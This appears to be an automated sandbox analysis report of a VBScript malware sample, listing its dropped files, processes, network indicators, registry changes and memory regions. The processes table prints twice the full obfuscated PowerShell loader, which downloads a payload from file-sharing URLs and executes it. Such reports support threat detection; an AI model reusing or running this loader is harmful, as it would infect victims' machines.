Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
update.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3582-490\wab.exe
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcqrymq3.s22.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3rwko11.bvi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhs4m25p.jzj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4n2wmog.lxm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp5023.tmp
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Acetylmethylcarbinol.Ron
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function
Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke(
$verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor
'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea
so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo
PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0
ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor
'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs
Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/
b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor
'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn
F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol
San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i
DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx
Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde%
hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh
bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene
(Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya
o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere
');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo
Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$
PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO
ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow
Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi
DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh
AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$
for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte
r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode
iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche
TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor
'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts
Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids
lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri
b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc=
N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ-
gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO
aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis
Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ')
;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf
NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe
VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc
') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu
sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC
frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln
P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC
trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo
.rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf
Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR
fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre
gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$
UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r
PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe
la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK
lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function
Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke(
$verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor
'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea
so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo
PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0
ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor
'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs
Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/
b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor
'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn
F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol
San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i
DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx
Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde%
hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh
bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene
(Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya
o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere
');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo
Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$
PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO
ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow
Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi
DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh
AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$
for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte
r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode
iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche
TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor
'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts
Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids
lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri
b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc=
N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ-
gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO
aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis
Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ')
;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf
NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe
VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc
') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu
sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC
frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln
P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC
trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo
.rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf
Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR
fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre
gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$
UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r
PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe
la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK
lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://fs13n1.sendspace.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/medjl1
|
104.21.28.80
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/IwX
|
unknown
|
||
|
https://fs03n2.sendspace.com/.
|
unknown
|
||
|
https://fs03n2.sendspace.com/m
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/7dhid7
|
104.21.28.80
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin
|
unknown
|
||
|
https://fs03n2.sendspace.com/om:443l
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp
|
69.31.136.57
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/7dhid7XR
|
unknown
|
||
|
https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin
|
69.31.136.17
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/7dhid7P
|
unknown
|
||
|
https://fs03n2.sendspace.com/
|
unknown
|
||
|
https://fs13n1.sendspaX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://fs13n1.sendspace.com
|
unknown
|
||
|
https://fs13n1.sendspace.com0
|
unknown
|
||
|
http://crl.microt
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fs03n2.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
104.21.28.80
|
||
|
fs13n1.sendspace.com
|
69.31.136.57
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
69.31.136.17
|
fs03n2.sendspace.com
|
United States
|
||
|
104.21.28.80
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n1.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5F21000
|
trusted library allocation
|
page read and write
|
|
|
|
8B40000
|
direct allocation
|
page execute and read and write
|
|
|
|
26F3F960000
|
trusted library allocation
|
page read and write
|
|
|
|
9DEA000
|
direct allocation
|
page execute and read and write
|
|
|
|
26F2F8F1000
|
trusted library allocation
|
page read and write
|
||
|
CA7D14E000
|
stack
|
page read and write
|
||
|
CA7D6FE000
|
stack
|
page read and write
|
||
|
26F47E0E000
|
heap
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20E4E000
|
stack
|
page read and write
|
||
|
1E6D327D000
|
heap
|
page read and write
|
||
|
7A6D000
|
stack
|
page read and write
|
||
|
20F50000
|
direct allocation
|
page read and write
|
||
|
1E6D514D000
|
heap
|
page read and write
|
||
|
1E6D5155000
|
heap
|
page read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
78C7000
|
trusted library allocation
|
page read and write
|
||
|
26F2DE36000
|
heap
|
page read and write
|
||
|
1E6D32AE000
|
heap
|
page read and write
|
||
|
26F47EB0000
|
heap
|
page read and write
|
||
|
CA7DBBB000
|
stack
|
page read and write
|
||
|
26F2FE2C000
|
trusted library allocation
|
page read and write
|
||
|
26F2DF40000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1E6D31E5000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
1E6D50A7000
|
heap
|
page read and write
|
||
|
1E6D5146000
|
heap
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F3C000
|
direct allocation
|
page read and write
|
||
|
861E000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
20F34000
|
direct allocation
|
page read and write
|
||
|
8BF0000
|
direct allocation
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
78D0000
|
heap
|
page execute and read and write
|
||
|
87D1000
|
heap
|
page read and write
|
||
|
26F31B0E000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
direct allocation
|
page read and write
|
||
|
93EA000
|
direct allocation
|
page execute and read and write
|
||
|
1E6D327C000
|
heap
|
page read and write
|
||
|
3369000
|
heap
|
page read and write
|
||
|
8C40000
|
direct allocation
|
page read and write
|
||
|
20F48000
|
direct allocation
|
page read and write
|
||
|
3190000
|
trusted library section
|
page read and write
|
||
|
722A000
|
stack
|
page read and write
|
||
|
7250000
|
direct allocation
|
page read and write
|
||
|
26F2F890000
|
heap
|
page execute and read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
26F2FE1D000
|
trusted library allocation
|
page read and write
|
||
|
20F38000
|
direct allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1E6D50A7000
|
heap
|
page read and write
|
||
|
1E6D3294000
|
heap
|
page read and write
|
||
|
2830000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
1E6D5041000
|
heap
|
page read and write
|
||
|
7B30000
|
